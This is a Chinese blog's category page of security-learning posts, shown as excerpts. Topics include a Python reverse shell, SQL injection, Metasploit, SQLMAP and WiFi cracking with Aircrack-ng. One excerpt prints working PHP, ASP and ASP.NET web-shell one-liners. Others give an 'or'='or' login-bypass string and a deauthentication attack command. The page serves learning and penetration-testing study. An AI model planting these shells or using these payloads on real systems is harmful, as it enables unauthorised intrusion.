
Hack学习
文章平均质量分 61
PolluxAvenger
这个作者很懒,什么都没留下…
展开
-
Python Security 之 反向Shell
首先我们先演示使用Python如何利用web服务器的功能,把文件从另一台主机传送过来。 我们假设你有一台傀儡主机,你现在想下载傀儡机上面的的文件。那么你就可以使用shell(或meterpreter)去访问这台傀儡机,你可以通过一行Python代码把傀儡机建立成为一个web服务器,然后下载傀儡机上面的文件.创建一个python HTTP服务器可以直接使用python的内建函数”SimpleHTTP原创 2015-07-14 19:44:36 · 1296 阅读 · 0 评论 -
Python Security 之 端口扫描
这一章将会演示如何通过Python的网络连接来开发一个基础的端口扫描器 我们的设计思路是使用socket一遍又一遍的去连接ip与端口的组合的新值下面的代码就演示了如何使用内建的socket模块去建立一个socket连接import sockets = socket.socket()s.connect(('127.0.0.1s', 22))s.send('Primal Security \n')原创 2015-07-14 19:28:40 · 843 阅读 · 0 评论 -
Python Security 入门
这篇文章假定你的系统是Linux,python版本是2.*。你可以使用内置的help()函数去了解一个函数的详细。记住这一点,它可以帮助你在学习语言的时候学习到更多的详细内容. 如help(type)有时你会想把一些变量和字符串连接起来然后通过脚本显示出来。那么你就需要使用str()函数把整型转换成字符串类型ip = '1.1.1.1'port = 55print 'the ip is原创 2015-07-13 22:03:03 · 1697 阅读 · 0 评论 -
Linux和Windows堆栈溢出利用对比
堆栈溢出的利用,有三大条件,一是返回点的定位,二是ShellCode的编写,三是跳转到ShellCode。1.返回点的定位在Windows下,F.ZH的在它经典的《菜鸟版Exploit编写指南之一》的文章中,详细的讲述了利用报错对话框精确定位溢出返回点的方法。 Windows下弹出报错对话框,显示“0x74737271”指令引用“0x74737271”内存,该地址不能为“read”。里面隐含的意思原创 2015-07-13 14:17:41 · 1937 阅读 · 0 评论 -
一道CTF
在强网杯里的一道题,当时用的最笨的方法解决,之后给出Python和Matlab的解决方法,先贴一个手动解决的····· #include “stdio.h” int main() { char a[47]; a[0] = ‘f’;//102 a[1] = ‘l’;//108 a[2] = ‘a’;//97 a[3]原创 2015-07-04 08:34:46 · 663 阅读 · 0 评论 -
暴力搜索内存空间获得API的线性地址
暴力搜索内存空间中的API一个PE文件在编译和连接成功后,会有一个Import Table,当需要执行 API的时候,会先在Import Table中得到API的地址,然后调用它 而病毒是在PE文件编译好之后才插入的,它本身没有Import Table ,那么要如何得到API的地址呢? 任何一个DLL,都可以用LoadLibraryA来装入,然后通过GetProcAddress 来取得这个DLL转载 2015-07-03 18:04:46 · 808 阅读 · 0 评论 -
缓冲区溢出学习
溢出学习整理笔记原创 2015-07-04 11:49:52 · 1399 阅读 · 0 评论 -
逆向分析的经验
感谢Light4Freedom团队的Wins0n写的技术分享PPT以及周侃的PPT常用工具:Windbg / OllyDbg / Immunity Debugger / PEiD IDA Pro / Hex-Rays Decompiler / ARM / x64 …… ILSpy Metasploit Python Putty / WinSCP / nc C32Asm / 010Edi原创 2015-07-03 16:06:35 · 2778 阅读 · 0 评论 -
CTF编码
bacon cipher braille decode braille table flag mosi phone原创 2015-07-03 23:15:57 · 1368 阅读 · 0 评论 -
Metasploit 整理笔记
一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的 有内存溢出,网站程序漏洞利用,配置错误exploit。 payload 我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一 个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只 能在目标机器上原创 2015-07-12 14:31:58 · 14318 阅读 · 1 评论 -
Metasploit 学习笔记
在Kali中使用Metasploit,需要先开启PostgreSQL数据库服务和Metasploit服务 然后就可以完整的利用 msf 数据库查询 exploit 和记录service postgresql startservice metasploit start如果不想每次开机都这样,还可以配置随系统启动update-rc.d postgresql enableupdate-rc.d me原创 2015-07-11 23:11:05 · 21657 阅读 · 0 评论 -
Ubuntu 15.04 折腾手记(2)
1. WineWine 是一款让你在 Linux、MAC 上运行 Windows 程序的软件 截至我写的时候,Wine最新版本是1.7.48 beta版 安装命令:sudo add-apt-repository ppa:ubuntu-wine/ppasudo apt-get updatesudo apt-get install wine1.7 winetricks卸载命令:sudo apt-原创 2015-08-04 07:38:23 · 745 阅读 · 0 评论 -
Kali 相关辑录一
1.Kali 2.0 连接数据库首先判断数据库是否启动 service postgresql status 启动数据库 /etc/init.d/postgresql start设置数据库开机启动 update-rc.d postgresql enable查看端口使用情况 netstat -tln 默认监听是5432端口 查看msf是否成功连接数据库 msf > db_stat原创 2015-10-17 18:24:58 · 855 阅读 · 0 评论 -
又一个信息安全笔试题(伪)权威解析
1、sql注入有以下两个测试选项,选一个并且阐述不选另一个的理由: A. demo.jsp?id=2+1 B. demo.jsp?id=2-1 选B,在 URL 编码中 + 代表空格,可能会造成混淆2、以下链接存在 sql 注入漏洞,对于这个变形注入,你有什么思路? demo.do?DATA=AjAxNg== DATA有可能经过了 base64 编码再传入服务器,所以我们也要对参数原创 2016-07-20 11:44:59 · 11623 阅读 · 1 评论 -
腾讯 2016 春招笔试(伪)权威解析
这篇文章的原文在:原文地址1、应用程序开发过程中,下面哪些开发习惯可能导致安全漏洞?在程序代码中打印日志输出敏感信息方便测试(√)在使用数组前判断是否越界在生成随机数前使用当前时间设置随机数种子(√)设置配置文件权限为rw-rw-rw-(√)只说一下第三个吧,给出篇文章随机数是骗人的 这篇文章中提到的另一篇文章我也给出链接,省去大家查找的时间当随机不够随机:一个在线扑克游戏...原创 2016-06-04 09:47:41 · 11098 阅读 · 1 评论 -
Shodan的利用
Shodan 注册后在用户中心会有一个API Key,利用这个 Key 可以使用 shodan 的命令行版本,首先下载这个项目 git clone https://github.com/achillean/shodan-python.git 然后安装python setup.py buildpython setup.py install安装完成后要使用API Key 对 Shodan 进行初始原创 2016-04-05 13:02:56 · 16426 阅读 · 0 评论 -
Detux 沙盒搭建
Detux 介绍Limon 沙盒由于不是双机环境,被我搁置了,先解决 Detux 沙盒的问题 Detux 沙盒的 GitHub 地址和在线沙盒环境都给出了,如果想自己搭建也可以,作者在 GitHub 上指出其特别感谢 aurel,这个人构建了不同处理器的各种环境的虚拟机,供大家下载的地址问题出现下载完成后可以看到,都是qcow2格式的,或许这位同仁实现的就是在线的那个版本,上传的样本被传进后台新启原创 2016-05-31 12:50:15 · 2341 阅读 · 1 评论 -
用 maptail 构建简易攻击地图
maptail 描述的资料没有一个讲在 Debian 下安装的,我看的都是使用 Cent OS 进行搭建,其实是基于 Nodejs,然后调用 WEB 服务器访问日志实时打印出访问信息,那么我们可以在 Debian 上很轻松的配置一套,不过首先要安装 Node.js 和 npm, npm 依赖 Node.js 先安装它apt-get updateapt-get install git-core cu原创 2016-05-31 12:46:54 · 1875 阅读 · 0 评论 -
Web应用安全权威指南读书思维导图
拜读完了德丸浩的《Web应用安全权威指南》,果然如序中所写,“德丸本”名不虚传 由于有些图片过大,不得不进行压缩后再上传难免失真,如果难以看清可以联系我获取PDF版本原创 2016-04-06 14:45:36 · 2793 阅读 · 1 评论 -
密码找回和跨域的思维导图
最近总结了密码找回和跨域的知识,写了思维导图,制作软件是NovaMind原创 2016-03-03 13:41:14 · 1011 阅读 · 0 评论 -
Kali 2.0 使用 Reaver 的注意事项
1、刚一开始使用这条命令 airmon-ng start wlan0 就可以开始了,需要注意的是,在Kali 2.0里开启的不再是mon0了,而是wlan0mon,所以不要和 Kali 1.X 的版本代码混淆2、Kali 1.X 的命令无效在Kali 2.0 中必须自己手动开启网卡的监听模式,所以在执行完上面之后,需要自己手动开启监听模式ifconfig wlan0mon downiwconfig原创 2016-01-12 21:51:46 · 10902 阅读 · 0 评论 -
最短的各类一句话
转自:http://zone.wooyun.org/content/23474 菜刀readme.txt中附带一3个一句话: PHP: <?php @eval($_POST['chopper']);?> ASP: <%eval request("chopper")%> ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.I转载 2015-11-07 07:53:36 · 1884 阅读 · 0 评论 -
万能密码原理和总结
我们所常说的’or’=’or’万能密码的原理是这样的: SQL语句sql=”select * from user where username=’”&username&”‘and pass=’”& pass&’” ,当我们用户名和密码都填写’or’=’or’提交的时候,即此时语句中的username和pass都等于’or’=’or’,那么,这条SQL语句就变成了:sql=”select * fro原创 2015-07-04 10:57:35 · 20851 阅读 · 0 评论 -
SQLMAP 学习稿
SQLmap学习稿(感谢羽翼的教程和乌云@瞌睡龙的用户手册以及一个简易教程)Kali和BT5中是有区别的,Kali中不需要使用./sqlmap.py来调用程序,BT5中必须要指定这样一个位置。1、用-u来指定一个可以注入的URL判断能否进行注入后,用--tables来猜解表名,在过程中自己指定猜解的线程数量,最大为10,然后等待SQLmap自动跑猜解就好了。用--conclum转载 2015-05-25 14:44:34 · 2027 阅读 · 0 评论 -
Kali 升级失败(Unable to lock)
在给Kali系统升级的时候,遇到下面这个问题:E: Unable to lock the administration directory(/var/lib/dpkg/), is another process using it?解决方案是:sudo rm /var/cache/apt/archives/locksudo rm /var/lib/dpkg/lock升级命令:ap原创 2015-04-25 09:51:15 · 1616 阅读 · 0 评论 -
WPA2 和 WPA 的区别
WPA (Wi-Fi Protected Access, Wi-Fi 保护访问)主要为了提高无线LAN的安全性WPA2和WPA最大的不同就是WPA2为了更加安全,支持AES加密目前对与这个方案并没有什么非常好的解决办法一般来讲就是跑字典,由于穷举的时间几乎为不可能不过在了解的过程中,似乎有一种破解PIN码的方法颇为有效,日后再深入了解详写复制去Google翻译翻译结原创 2015-04-16 21:48:04 · 15972 阅读 · 0 评论 -
Aircrack-ng 学习笔记
破解过程简述:1、先开启设备监听模式命令:airmon-ng start wlan0然后最下方会提示出monitor mode enabled on mon0也就是监听模式已经在mon0开启2、然后根据这个mon0的监听,搜索所有无线网络命令:airodump-ng mon0这里会列出能够搜索到的范围内的所有无线网络这里注意几个重要参数即可PwR是信号的强度,数原创 2015-04-18 15:54:26 · 2399 阅读 · 0 评论 -
端口扫描器
public partial class Form1 : Form { private Thread T; //定义一个线程 public Form1() { InitializeComponent(); } pri原创 2015-03-31 22:26:19 · 638 阅读 · 0 评论 -
常用文件的文件头(十六进制)
JPEG (jpg),文件头:FFD8FFPNG (png),文件头:89504E47GIF (gif),文件头:47494638TIFF (tif),文件头:49492A00Windows Bitmap (bmp),文件头:424DCAD (dwg),文件头:41433130Adobe Photoshop (psd),文件头:38425053原创 2015-02-09 17:12:43 · 30438 阅读 · 0 评论 -
hackxor渗透平台环境的配置与使用
http://sourceforge.net/projects/hackxor转载 2014-10-03 12:47:11 · 2682 阅读 · 0 评论 -
Linux 下安装Nessus 5.0
不得不说Nessus 这个软件简直是蛋疼原创 2014-08-31 23:40:31 · 1552 阅读 · 0 评论 -
Nmap 安装及使用
Nmap 是一款开放源代码的网络探测和安全审核的工具。它的设计目标是快速地扫描大型网络Nmap使用原始IP报文来发现网络上有哪些主机,它们提供什么服务(应用程序名和版本)那些服务运行在什么操作系统(包括版本信息)中,它们使用什么类型的报文过滤器防火墙原创 2014-09-20 22:56:06 · 4512 阅读 · 0 评论 -
渗透学习整理稿
0x000 信息收集0x001 服务器原创 2014-08-21 23:47:42 · 1086 阅读 · 0 评论 -
Aircrack-ng的6种攻击模式
-0 deautenticate冲突模式使已经连接的合法客户端端强制断开与路由器的连接,使其重新连接。在重新连接过程中获得验证数据包,从而产生有效的arp数据。如果一个客户端连在路由器上,但是没有人上网来产生有效数据,此时即使用-3也无法产生有效的arp数据,所以就需要用-0攻击模式来配合-3攻击来会被激活aireplay-ng -0 10 -a ap_mac -c 合法客户端mac转载 2015-04-25 14:47:53 · 4783 阅读 · 0 评论 -
Hacking WiFi 的第二部分
在kali下,除了集成的reaver之外其他都要手动安装,用命令dpkg –i xx.deb就行了。 Minidwep-gtk是破解WEP的最佳选择,有GUI会使操作更加容易,得到IVS一定数量就可以破解,扫描到之后选择Lanch进行攻击就可以等着了,最后成功会出现提示,密码直接呈现给你。 WEP的不安全性是因为采用RC4算法的不安全特性,所以存在的缺陷不可避免。现在都原创 2015-05-03 15:26:08 · 1561 阅读 · 0 评论 -
Sparta
Sparta学习稿1、下载和安装介绍页面在http://sparta.secforce.com/#Download在Kali中的安装命令:git clone https://github.com/secforce/sparta.gitapt-get installpython-elixirapt-get install nmaphydra cutycaptapt-get翻译 2015-05-24 14:13:39 · 2671 阅读 · 0 评论 -
安卓恶意代码分析
看到了一篇讲安卓恶意代码分析的PPT 搬运到这里原创 2015-06-30 01:18:47 · 2514 阅读 · 0 评论 -
IDA一日速成整理笔记
IDA原创 2015-06-30 01:44:54 · 3877 阅读 · 0 评论 -
安装DVWA进行渗透测试
DVWA的安装依赖的组件有许多,简单的是安装XAMPP,安装完成之后用控制台将Apache和MySQL开启首先确定可以进入http://localhost/phpmyadmin 进行配置然后将DVWA解压出的文件夹放到C:\xampp\htdocs文件夹中,然后访问http://localhost/DVWA-1.0.8/setup.php进入安装界面,点击创建/重置数据库按钮时如果出现原创 2015-05-24 11:02:30 · 11068 阅读 · 0 评论 -
Base64 Base32 Base16全家桶
原文地址:http://www.iamstudy.cn/index.php/2015/05/02/505.html1、base64:它是用包括大小写字母各26个,加上10个数字,和加号“+”,斜杠“/”,一共64个字符来表示所有的ascii字符。原理: 3个字符为一组(三组),将字符ascii编码以二进制表示出来(就有24比特),由于2的6次方等于64,所以每6个比特又重新为一个组(这转载 2015-06-05 23:03:27 · 16791 阅读 · 0 评论